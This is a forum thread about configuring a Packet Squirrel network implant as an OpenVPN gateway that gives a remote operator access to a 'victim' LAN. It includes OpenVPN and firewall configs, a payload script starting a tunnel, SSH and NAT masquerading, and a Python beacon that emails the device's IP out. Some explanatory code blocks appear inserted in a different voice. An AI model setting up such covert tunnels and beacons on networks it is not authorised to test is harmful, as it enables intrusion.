StampeRnator (Author) Posted November 13, 2017

If I use the Packet Squirrel as a VPN client I can SSH into it from another client in this VPN. But is it also possible to put the Squirrel on a LAN and get access to the entire local network? Spent an hour on VPN server/client settings but still didn't get it to work.
biob Posted November 13, 2017

Maybe do something with port forwarding on the PS?
biob Posted November 13, 2017

Just found this: https://superuser.com/questions/1225259/port-forwarding-from-openvpn-client-to-public-internet. Haven't read it properly as I'm walking and trying to avoid walking into things :-)
StampeRnator (Author) Posted November 13, 2017

Hmmm... Trying it with the config like Darren mentioned in the LAN Turtle episode 1921. But on the Squirrel the settings in /etc/config/network are not persistent. Would there be a solution?
PoSHMagiC0de Posted November 13, 2017

If you use the graphical (free for 2 connections) VPN then it has settings in there to make the connection from a client a gateway. It needs to know the subnet of the client though, so if you do not know it, you will have to do the routing by hand. Also, you have to make sure the interface that faces the victim's network is set in iptables to masquerade. The iptables stuff you can make part of the payload to configure each time for persistence.

If you are using the road warrior script, it will have to be done by hand: the routing in the payload script, adding the routing to the server so it knows where that subnet is, and a route on the machine you are using to the server for that subnet so your machine knows where it is.

I have not researched this deeply enough, but for the clients for OpenVPN on the server there is a client script folder. If you have your routes and such commands in there, the client that script is associated with will download that script and run it after connecting to OpenVPN, thus all your routes and mappings can be done then. Don't know if your iptables can be in there too for masquerading the exit point on the victim network.

I have the PS but have yet to dig deeply into trying stuff, but if I were to put a Raspberry Pi RAT out there, these would be the procedures needed to get a VPN tunnel to expose the victim's network.

Now, having a listener from your attack machine through the VPN to the victim network will take port forwarding, because the victim that gets the stager cannot see the PS as a gateway by default; the stager needs to point to the PS and a port that is forwarded so it gets back to the attacker machine and the port the framework is listening on. Prepare for some routing fun.
StampeRnator (Author) Posted November 13, 2017

> 10 minutes ago, PoSHMagiC0de said: If you use the graphical (free for 2 connections) VPN then it has settings in there to make the connection from a client a gateway. It needs to know the subnet of the client though, so if you do not know it, you will have to do the routing by hand. Also, you have to make sure the interface that faces the victim's network is set in iptables to masquerade.

I didn't need the VPN GUI; I think my config is right. (If I tracert from my second "pentester" VPN client, the hop goes to the VPN IP of the PS, but after that there is no response.) I think it's a problem with the firewall on the PS.
StampeRnator (Author) Posted November 13, 2017

Additional info: always using the first VPN mode (FOR_CLIENTS=0). Adding iptables PREROUTING rules in the payload or in /etc/firewall.user doesn't work. I'm still thinking the server routing etc. is correct.
StampeRnator (Author) Posted November 13, 2017

Is this feature planned for the future? Otherwise I'll try it until it works :D
PoSHMagiC0de Posted November 13, 2017

Try the masquerading with your iptables. You might be able to just masquerade with no interface and it will work like it does when sharing internet with the Pineapple and BB through *nix systems:

```
iptables -A POSTROUTING -t nat -j MASQUERADE
```

I know if I share internet with my Pi Zero W I do not need to add an iptables rule on either the Pi or the host machine to NAT traffic specifically from one to the other to share internet. I just need to make sure IP forwarding is enabled on the host machine, a default route is present (or routes for the subnets I want to forward to) and masquerading in the nat table is set on the host. The default gateway on the Pi also needs to point to the IP of the host it is connected to. So I am turning my host machine into a router for the Pi.

So, you need the ping to look like it came from the PS, with masquerade. Without it, I believe it sees it is from the IP of your machine, which the machines on the network do not know how to reach, since their gateway is the router for the network, not the PS that contains the route. This also means you need to be running in a mode where the PS gets its own IP too.
Lux Æterna Posted November 13, 2017

Hey @StampeRnator, I detailed my solution to your problem here, hope this helps!
PoSHMagiC0de Posted November 13, 2017

> 17 minutes ago, Lux Æterna said: Hey @StampeRnator, I detailed my solution to your problem here, hope this helps!

I didn't even see that. I typed all that crap out for nothing. Welp, now I know where the client script folder goes on a non-graphical VPN connection. For everyone who followed this: this is how the graphical OpenVPN does the routing behind the scenes when you create clients. So if you wanted to get creative you could edit that roadwarrior script, or that other one I posted somewhere that has extra encryption options, to include a config section for the route configs/ccd configs. Might want to include a check to make sure you do not have duplicate subnets anywhere (grep the file for the same subnets, or subnets within a super subnet, etc.).
StampeRnator (Author) Posted November 14, 2017

Now I'll write down my config for this; maybe it can be optimized (I'm only a scriptkiddie :P) :D

My VPN network: 10.9.0.0/24
My target network: 192.168.1.0/24

First, the VPN server config. Like @Lux Æterna mentioned, the following config is for the non-GUI version and the roadwarrior script. VPN server "server.conf":

```
client-config-dir ccd   # Only "ccd" works for me, but otherwise "/etc/openvpn/ccd" also works
client-to-client
# One "push" and one "route" line per target IP subnet. The "route" line:
# not sure if needed, I read this is only needed if you want to get access
# from the VPN server itself to the target network
push "route 192.168.1.0 255.255.255.0"
route 192.168.1.0 255.255.255.0
push "route 192.168.0.0 255.255.255.0"
route 192.168.0.0 255.255.255.0
push "route 10.0.0.0 255.255.255.0"
route 10.0.0.0 255.255.255.0
management 127.0.0.1 5555   # optional, if you want to use a VPN status page
```

If you want to add more IP subnets you have to add the "push" and "route" line for every subnet.

Now the ccd magic. Create a folder "ccd" in /etc/openvpn and cd into it, so you are in the directory "/etc/openvpn/ccd". In there, create a file named the same as the client you created with the roadwarrior script (default is "client"). Content of the file "/etc/openvpn/ccd/client":

```
# This always gives the Squirrel the IP address 10.9.0.2. I use the 10.9.0.0/24
# VPN IP subnet; the default is 10.8.0.0, so in that case it would be 10.8.0.2
ifconfig-push 10.9.0.2 255.255.255.0
iroute 192.168.1.0 255.255.255.0   # Your target IP subnet
iroute 192.168.0.0 255.255.255.0   # Your second target IP subnet
iroute 10.0.0.0 255.255.255.0      # Your third target IP subnet
```

Now the Squirrel config. First add this to the end of "/etc/config/firewall": broken atm... looking for this.

Now my payload.sh:

```bash
#!/bin/bash
# OpenVPN payload
# Set to 1 to allow clients to use the VPN
FOR_CLIENTS=0
DNS_SERVER="8.8.8.8"

# Cheap hack to set the DNS server
function setdns() {
    while true
    do
        # grep -q prints nothing, so test its exit status instead of its output
        grep -q "$DNS_SERVER" /tmp/resolv.conf || {
            echo -e "search lan\nnameserver $DNS_SERVER" > /tmp/resolv.conf
        }
        sleep 5
    done
}

function start() {
    LED SETUP
    DIR=$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)

    # Set NETMODE to BRIDGE (VPN when FOR_CLIENTS=1) and wait 3 seconds
    # to ensure that things can settle
    [[ "$FOR_CLIENTS" == "1" ]] && {
        /usr/bin/NETMODE VPN
    } || {
        /usr/bin/NETMODE BRIDGE
    }
    sleep 3

    # Make OpenVPN use the local configuration
    uci set openvpn.vpn.config="${DIR}/config.ovpn"
    uci commit

    # Start OpenVPN in the background
    /etc/init.d/openvpn start

    # Start SSH server
    /etc/init.d/sshd start &

    # Set DNS server
    setdns &

    # Set iptables for access to the entire network (for me only this did the trick).
    # If not for you, maybe try to uncomment the optional iptables line
    iptables -A POSTROUTING -t nat -j MASQUERADE
    # OPTIONAL: uncomment and change to your needs
    # iptables -t nat -A POSTROUTING -o eth1 -s 10.9.0.0/24 -j MASQUERADE

    LED ATTACK
}

# Start the payload
start &
```

Optional VPN status page: for this you have added "management 127.0.0.1 5555" to your "server.conf". The script is located here: https://pastebin.com/U9SESPB0 If you have a webserver on the VPN server you can show the connected clients and the traffic of the VPN. Just put this into a "vpnstatus.php" on your webserver. If you use PHP 5.x the script is exactly right; if you use PHP 7, replace "split" with "explode".

Much thanks to @Lux Æterna, @PoSHMagiC0de and the writer of the VPN status page, AND of course @Darren Kitchen for developing this awesome Squirrel. Without you I couldn't have gotten it to work. #micdrop
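The server-side part of the post above (push/route in server.conf, ifconfig-push/iroute in the ccd file) is repetitive and, as PoSHMagiC0de noted earlier, easy to break with a duplicate or nested subnet. The following is an added example and not anything from the thread or from the roadwarrior installer: a small Python 3 generator that takes the VPN subnet, the Squirrel's ccd name and pinned VPN address, and the target LAN subnets, and emits both files while refusing overlapping subnets. It assumes the server runs with `topology subnet` (so `ifconfig-push` takes an address plus netmask and the server itself holds the first host address); the numbers in the usage block are the thread's own.

```python
"""Generate the OpenVPN server-side routing pieces for a Packet Squirrel gateway.

Added example for this thread, not the poster's own files. Emits the
server.conf lines (client-to-client, push/route) and the ccd file
(ifconfig-push/iroute) for one gateway client. Duplicate, nested or
VPN-overlapping target subnets are rejected, because two clients (or a client
and the VPN itself) claiming the same prefix silently breaks routing.
Assumes `topology subnet` (ifconfig-push with a netmask).
"""
import ipaddress
from typing import Dict, List, Optional

Net = ipaddress.IPv4Network


def parse_targets(cidrs: List[str], vpn_net: Net) -> List[Net]:
    """Parse target LAN CIDRs, refusing duplicates, nesting and VPN overlap.

    strict=True also rejects host addresses such as 192.168.1.5/24, which
    would otherwise be accepted and turn into a wrong iroute.
    """
    targets: List[Net] = []
    for cidr in cidrs:
        net = ipaddress.ip_network(cidr, strict=True)
        if not isinstance(net, Net):
            raise ValueError("only IPv4 targets are handled here: %s" % cidr)
        if net.overlaps(vpn_net):
            raise ValueError("%s overlaps the VPN subnet %s" % (net, vpn_net))
        for seen in targets:
            # overlaps() covers equality and nesting in either direction
            if net.overlaps(seen):
                raise ValueError("%s overlaps %s" % (net, seen))
        targets.append(net)
    return targets


def server_conf_lines(targets: List[Net], management_port: Optional[int] = None) -> List[str]:
    """server.conf additions: push each target route to the other VPN clients
    and give the server's own kernel a route into the tunnel for it."""
    lines = ["client-config-dir ccd", "client-to-client"]
    for net in targets:
        lines.append('push "route %s %s"' % (net.network_address, net.netmask))
        lines.append("route %s %s" % (net.network_address, net.netmask))
    if management_port is not None:
        lines.append("management 127.0.0.1 %d" % management_port)
    return lines


def ccd_lines(vpn_net: Net, client_ip: str, targets: List[Net]) -> List[str]:
    """ccd/<client>: pin the client's VPN address, then one iroute per target
    so OpenVPN knows which client owns those subnets."""
    ip = ipaddress.ip_address(client_ip)
    if ip not in vpn_net or ip in (vpn_net.network_address, vpn_net.broadcast_address):
        raise ValueError("%s is not a usable host address in %s" % (ip, vpn_net))
    if ip == vpn_net.network_address + 1:
        raise ValueError("%s is the server's own address with topology subnet" % ip)
    lines = ["ifconfig-push %s %s" % (ip, vpn_net.netmask)]
    for net in targets:
        lines.append("iroute %s %s" % (net.network_address, net.netmask))
    return lines


def build(vpn_cidr: str, client_name: str, client_ip: str,
          target_cidrs: List[str], management_port: Optional[int] = None) -> Dict[str, str]:
    """Return {relative file name: contents} for the two files under
    /etc/openvpn. Nothing is written to disk here; the caller does that."""
    vpn_net = ipaddress.ip_network(vpn_cidr, strict=True)
    targets = parse_targets(target_cidrs, vpn_net)
    return {
        "server.conf": "\n".join(server_conf_lines(targets, management_port)) + "\n",
        "ccd/" + client_name: "\n".join(ccd_lines(vpn_net, client_ip, targets)) + "\n",
    }


if __name__ == "__main__":
    # The thread's numbers: 10.9.0.0/24 VPN, Squirrel pinned to 10.9.0.2
    files = build("10.9.0.0/24", "client", "10.9.0.2",
                  ["192.168.1.0/24", "192.168.0.0/24", "10.0.0.0/24"], 5555)
    for name, body in files.items():
        print("### %s\n%s" % (name, body))
```

Append the `server.conf` lines to the existing file rather than replacing it, and restart the server afterwards; the ccd file is read per connection, so a changed iroute only needs the Squirrel to reconnect.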
StampeRnator (Author) Posted November 14, 2017

If you don't know the IP subnet of your target network, I have taken a small Python script that I used on my RPi (yay, the Squirrel likes Python) to email me the actual IP address of the device. If you know the IP you can change the routing settings on the server, and after the reconnect of the OpenVPN client you can access the network. If you want this I can put it on GitHub. I put the following file in the switch folder "payloads/switch3/mailip.py" (only Gmail works as sender):

```python
#!/usr/bin/env python
__author__ = 'Cody Giles'
__license__ = "Creative Commons Attribution-ShareAlike 3.0 Unported License"
__version__ = "1.0"
__maintainer__ = "Cody Giles"
__status__ = "Production"

import subprocess
import smtplib
from email.mime.text import MIMEText
import datetime


def connect_type(word_list):
    """Take a list of words from an `ip route` line and, depending on which
    interface name it contains, return the connection type as a string,
    i.e. 'ethernet', 'wifi' or 'current'."""
    if 'wlan0' in word_list or 'wlan1' in word_list:
        con_type = 'wifi'
    elif 'eth0' in word_list:
        con_type = 'ethernet'
    else:
        con_type = 'current'
    return con_type


# Change to your own account information
to = 'your@mail.com'                # Email to send to.
gmail_user = 'yourgmail@gmail.com'  # Email to send from. (MUST BE GMAIL)
gmail_password = 'mailpassword'     # Gmail password.

smtpserver = smtplib.SMTP('smtp.gmail.com', 587)  # Server to use.
smtpserver.ehlo()                                 # Says 'hello' to the server
smtpserver.starttls()                             # Start TLS encryption
smtpserver.ehlo()
smtpserver.login(gmail_user, gmail_password)      # Log in to server

today = datetime.date.today()  # Get current time/date

arg = 'ip route list'  # Linux command to retrieve ip addresses.
# Runs 'arg' in a 'hidden terminal'; universal_newlines gives str instead of
# bytes on Python 3, so the string comparisons below work on both versions.
p = subprocess.Popen(arg, shell=True, stdout=subprocess.PIPE, universal_newlines=True)
data = p.communicate()  # Get data from 'p terminal'.

# Split the route table into lines and use the first one that carries a
# 'src' address (the default route printed by busybox ip has none).
ip_lines = data[0].splitlines()
split_line_a = []
for line in ip_lines:
    words = line.split()
    if 'src' in words:
        split_line_a = words
        break

# con_type variable for the message text, e.g. 'ethernet', 'wifi', etc.
ip_type_a = connect_type(split_line_a)

# Because the text 'src' is always followed by an ip address, we can use the
# 'index' function to find 'src' and add one to get the index of our ip.
if 'src' in split_line_a:
    ipaddr_a = split_line_a[split_line_a.index('src') + 1]
else:
    ipaddr_a = 'unknown (no src in ip route output)'

# Creates a sentence for the ip address.
my_ip_a = 'Your %s ip is %s' % (ip_type_a, ipaddr_a)

# Creates the text, subject, 'from', and 'to' of the message.
msg = MIMEText(my_ip_a)
msg['Subject'] = 'IPs For RaspberryPi on %s' % today.strftime('%b %d %Y')
msg['From'] = gmail_user
msg['To'] = to

# Sends the message
smtpserver.sendmail(gmail_user, [to], msg.as_string())

# Closes the smtp server.
smtpserver.quit()
```

Don't forget to chmod +x the mailip.py.

Then just add the following to your payload:

```bash
# Set iptables for access to the entire network
iptables -A POSTROUTING -t nat -j MASQUERADE
python ${DIR}/mailip.py
LED ATTACK
```

And that's it. #doublemicdrop
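The script above mails one address, but what the server's ccd file actually needs is the connected prefix (or prefixes) of the target LAN, which is also what GrineUlf's "SSH in and get the network information" step below boils down to. As an added example, not the poster's script, here is a Python 3 parser for `ip route list` output that returns structured routes and keeps only the directly connected, non-tunnel, non-default prefixes, then prints the matching `iroute` lines. The sample route table is constructed for the example (interface names `br-lan` and `tun0` are the thread's; the VPN server's public address is a TEST-NET address); it assumes Python 3.7 or newer, so paste the table from the Squirrel into it on your own machine if the device only has Python 2.

```python
"""Derive the iroute targets from the route table the Squirrel actually has.

Added example for this thread, not the poster's script. Parses `ip route list`
into structured routes and keeps only directly connected prefixes on the LAN
side (no `via`, not the tunnel device, not the default route), which are
exactly the subnets that belong in the server's ccd file.
"""
import ipaddress
import subprocess
from typing import List, NamedTuple, Optional


class Route(NamedTuple):
    prefix: ipaddress.IPv4Network
    dev: Optional[str]
    via: Optional[str]
    src: Optional[str]


# Constructed sample of what `ip route list` prints on a Squirrel in BRIDGE
# mode with the tunnel up. busybox ip prints no `src` on the default route,
# and the host route to the VPN server (TEST-NET address) has a `via`.
SAMPLE_ROUTES = """\
default via 192.168.1.1 dev br-lan
10.9.0.0/24 dev tun0 proto kernel scope link src 10.9.0.2
192.168.1.0/24 dev br-lan proto kernel scope link src 192.168.1.50
203.0.113.10 via 192.168.1.1 dev br-lan
"""


def parse_ip_route(text: str) -> List[Route]:
    """Parse `ip route list` lines; keyword/value pairs may appear in any order."""
    routes: List[Route] = []
    for line in text.splitlines():
        words = line.split()
        if not words:
            continue
        if words[0] == "default":
            prefix = ipaddress.ip_network("0.0.0.0/0")
        else:
            # host routes are printed without /len; ip_network makes them /32
            prefix = ipaddress.ip_network(words[0], strict=False)
        if not isinstance(prefix, ipaddress.IPv4Network):
            continue  # the IPv6 table is separate; ignore it if ever fed here

        def value_after(key: str) -> Optional[str]:
            # only accept the keyword when a value actually follows it
            return words[words.index(key) + 1] if key in words[:-1] else None

        routes.append(Route(prefix, value_after("dev"), value_after("via"), value_after("src")))
    return routes


def lan_targets(routes: List[Route], tunnel_devs=("tun0", "lo")) -> List[Route]:
    """Directly connected, non-default prefixes on non-tunnel interfaces."""
    return [r for r in routes
            if r.via is None
            and 0 < r.prefix.prefixlen < 32
            and r.dev not in tunnel_devs]


def iroute_lines(routes: List[Route]) -> List[str]:
    """The ccd lines to add on the server for what this device can reach."""
    return ["iroute %s %s" % (r.prefix.network_address, r.prefix.netmask)
            for r in lan_targets(routes)]


def live_routes() -> List[Route]:
    """Read the real table on a box with `ip` (busybox ip output parses too)."""
    out = subprocess.run(["ip", "route", "list"], capture_output=True,
                         universal_newlines=True, check=True).stdout
    return parse_ip_route(out)


if __name__ == "__main__":
    for line in iroute_lines(parse_ip_route(SAMPLE_ROUTES)):
        print(line)
```

On the sample table this yields a single `iroute 192.168.1.0 255.255.255.0`; the tunnel prefix is dropped because an iroute for the VPN's own subnet would conflict with the server, and the `via` routes are dropped because they are not networks the Squirrel is attached to.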
StampeRnator (Author) Posted November 14, 2017

> 6 hours ago, StampeRnator said: Now the Squirrel config. First add this to the end of "/etc/config/firewall": broken atm... looking for this.

Okay. Only with the following at the end of "/etc/config/firewall" does the connection to the Packet Squirrel network work:

```
# Forwarding src/dest are zone names, not interface names. Add this zone only
# if your firmware's /etc/config/firewall does not already define a zone that
# covers tun0.
config zone
	option name 'tun0'
	option device 'tun0'
	option input 'ACCEPT'
	option output 'ACCEPT'
	option forward 'ACCEPT'

# The two forwarding sections need distinct names; two sections called 'vpn'
# would collide in UCI and only one survives.
config forwarding 'vpn_in'
	option src 'tun0'
	option dest 'lan'

config forwarding 'vpn_out'
	option src 'lan'
	option dest 'tun0'
```

If the VPN payload is started, everything on the machine on the network side of the Squirrel is OK (internet connection). But in arming mode there is no internet. DNS looks to work, but not HTTP or similar. Maybe somebody has a suggestion?
PoSHMagiC0de Posted November 14, 2017

Remove the email part if you want. If the VPN is going to come up and work one way, like from the Squirrel to the server, then just have it scp a file onto the server for you to look at for the network information, if you own the server.
GrineUlf Posted May 28, 2018

Or just SSH into the Turtle, get the network information, update the client file on the server and restart the server. The PS reconnects anyway after a minute or two?
Kiril Miloshev Posted December 3, 2018

OK, I still can't make this work. No ping to the Squirrel br-lan IP address or the other part of the target network. Have tried all of the above. Any ideas?
INFOTRACE Posted August 4, 2019

> On 12/3/2018 at 3:32 PM, Kiril Miloshev said: OK, I still can't make this work. No ping to the Squirrel br-lan IP address or the other part of the target network. Have tried all of the above. Any ideas?

Hi Kiril, did you resolve the issues back in 2018, and if so, how? Would you recommend the device? Cheers 😎
BRS Chief Scientist Posted November 21, 2019

> On 11/13/2017 at 1:06 PM, PoSHMagiC0de said: If you use the graphical (free for 2 connections) VPN then it has settings in there to make the connection from a client a gateway. [...] Prepare for some routing fun.

Thanks for the input.